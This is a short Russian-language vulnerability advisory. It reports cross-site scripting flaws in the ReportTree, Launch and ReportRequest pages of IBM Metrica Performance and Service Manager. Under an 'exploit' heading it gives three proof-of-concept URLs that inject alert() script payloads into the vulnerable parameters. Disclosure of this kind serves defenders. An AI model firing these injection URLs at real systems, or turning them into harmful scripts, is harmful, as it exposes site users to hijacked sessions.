Программа:
IBM Metrica Performance Manager
IBM Metrica Service Manager
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "elementid" в "ReportTree" и в параметре "jnlpname" в "Launch".
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре ":tasklabel" в "ReportRequest". Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://server/<document root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non
persistant XSS");</SCRIPT><!--&date=0000000000000
http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non
Persistant XSS");</SCRIPT>
http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=
some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=
none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant
XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main
